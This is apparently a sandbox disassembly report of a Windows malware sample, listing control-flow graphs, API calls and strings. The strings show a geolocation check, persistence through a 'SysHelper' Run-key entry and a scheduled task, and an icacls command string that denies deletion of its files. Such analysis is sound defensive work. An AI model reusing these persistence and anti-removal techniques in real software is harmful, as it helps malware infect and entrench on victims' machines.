                                                                                                • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$pU$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                • API String ID: 2957410896-2050406331
                                                                                                • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 705 40d3e2-40d3fe call 40b140 697->705 706 40d3cc-40d3dd CoUninitialize 697->706 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 705->711 712 40d404 705->712 706->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                • API String ID: 2496729271-1738591096
                                                                                                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                • API String ID: 3668891214-3807497772
                                                                                                • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 923 40d037 922->923 923->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 943 40d0cd-40d0e1 call 414300 935->943 944 40d0bf-40d0ca call 422587 935->944 940 40d093-40d09b call 422587 936->940 941 40d09e-40d0b4 call 413d40 936->941 938->912 939->938 940->941 941->935 943->928 954 40d0e7-40d149 call 413010 943->954 944->943 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 970 40d1c7-40d1c9 967->970 969 40d1a2-40d1a6 968->969 971 40d1b3-40d1c5 969->971 972 40d1a8-40d1b0 call 422587 969->972 970->969 971->931 972->971
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0040CF4A
                                                                                                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                Strings
                                                                                                • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                • "country_code":", xrefs: 0040CFE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                • API String ID: 1485416377-2962370585
                                                                                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 615 411da0-411da9 613->615 616 411daf-411dcb call 415c10 614->616 615->615 617 411dab-411dad 615->617 620 411dd1-411df8 lstrlenA call 413520 616->620 621 411e7c-411e87 616->621 617->616 627 411e28-411e2c 620->627 628 411dfa-411dfe 620->628 623 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->623 624 411e89-411e91 call 422587 621->624 631 411f36-411f38 623->631 632 411f3a-411f3f 623->632 624->623 635 411e3c-411e50 PathFileExistsW 627->635 636 411e2e-411e39 call 422587 627->636 633 411e00 628->633 634 411e0b-411e1f 628->634 638 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 631->638 639 411f40-411f49 632->639 641 411e03-411e08 call 422587 633->641 642 411e23 call 4145a0 634->642 635->621 640 411e52-411e57 635->640 636->635 653 411f98-411fa0 638->653 654 411fce-411fe9 638->654 639->639 644 411f4b-411f4d 639->644 645 411e59-411e5e 640->645 646 411e6a-411e6e 640->646 641->634 642->627 644->638 645->646 649 411e60-411e65 call 414690 645->649 646->610 651 411e74-411e77 646->651 649->646 655 4121ff-412204 call 422587 651->655 656 411fa2-411fa4 653->656 657 411fa6-411faf 653->657 659 411feb-411fed 654->659 660 411fef-411ff8 654->660 655->610 663 411fbf-411fc9 call 415c10 656->663 665 411fb0-411fb9 657->665 661 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 659->661 662 412000-412009 660->662 671 4121d1-4121d5 661->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->672 662->662 666 41200b-41200d 662->666 663->654 665->665 668 411fbb-411fbd 665->668 666->661 668->663 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                • _memset.LIBCMT ref: 00411D3B
                                                                                                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                • _memset.LIBCMT ref: 00412090
                                                                                                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                • _memset.LIBCMT ref: 00412120
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                • API String ID: 2589766509-1182136429
                                                                                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 984 4235a0 976->984 977->976 983 4235c0-4235c3 977->983 985 4235d7-4235dd 983->985 986 4235c5 983->986 989 4235a2-4235a8 984->989 987 4235e9 call 42fb64 985->987 988 4235df 985->988 990 4235c7-4235c9 986->990 991 4235cb-4235d5 call 425208 986->991 996 4235ee-4235fa call 42f803 987->996 988->991 992 4235e1-4235e7 988->992 990->985 990->991 991->984 992->987 992->991 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->989 1016 4236ac-4236af 1009->1016 1011 423637-423653 call 42f939 1010->1011 1012 42362f-423635 1010->1012 1011->989 1020 423659-42365c 1011->1020 1012->1009 1012->1011 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->989 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->989 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 004235B1
                                                                                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                • __allrem.LIBCMT ref: 004236F3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                • __allrem.LIBCMT ref: 00423726
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                • __allrem.LIBCMT ref: 0042375B
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                • String ID:
                                                                                                • API String ID: 1503770280-0
                                                                                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1060 4240f6 1062 4240b2 1060->1062 1063 42403b-424051 call 4321a1 1060->1063 1064 424090-424095 call 427c59 1062->1064 1065 4240b4-4240b8 1062->1065 1076 424053-42405a call 427c2e 1063->1076 1077 42405b-424065 call 427c68 1063->1077 1075 4240c5-4240d3 call 428565 1064->1075 1067 4240c0 call 427c4a 1065->1067 1068 4240ba-4240bb call 427cec 1065->1068 1067->1075 1068->1067 1076->1077 1084 424067-42406d call 427c2e 1077->1084 1085 42406e-424088 call 432a1c call 419f90 1077->1085 1084->1085 1085->1064 1092 42408a-42408b call 427f3d 1085->1092 1092->1064
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 2587630013-0
                                                                                                • Opcode ID: 09217920513a334b6f79b9e541313f96d920471f94f8c93875b1f7a29f43a62f
                                                                                                • Instruction ID: 7082b750ddc29103f3c984cb6fc30cb2f1280ee8f42cb5262a6b676f22e3f134
                                                                                                • Opcode Fuzzy Hash: 09217920513a334b6f79b9e541313f96d920471f94f8c93875b1f7a29f43a62f
                                                                                                • Instruction Fuzzy Hash: F6F0F460709331A9DA3173B37A12B5F1654DF81768FE0054FF600A61C3DE9C8981856E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1094 427b0b-427b1a call 427ad7 ExitProcess
                                                                                                APIs
                                                                                                • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                  • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                  • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                • String ID: i;B
                                                                                                • API String ID: 2427264223-472376889
                                                                                                • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1097 42fb64-42fb77 call 428520 1100 42fba5-42fbaa call 428565 1097->1100 1101 42fb79-42fb8c call 428af7 1097->1101 1106 42fb99-42fba0 call 42fbab 1101->1106 1107 42fb8e call 42fe47 1101->1107 1106->1100 1110 42fb93 1107->1110 1110->1106
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 0042FB7B
                                                                                                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                Memory Dump Source
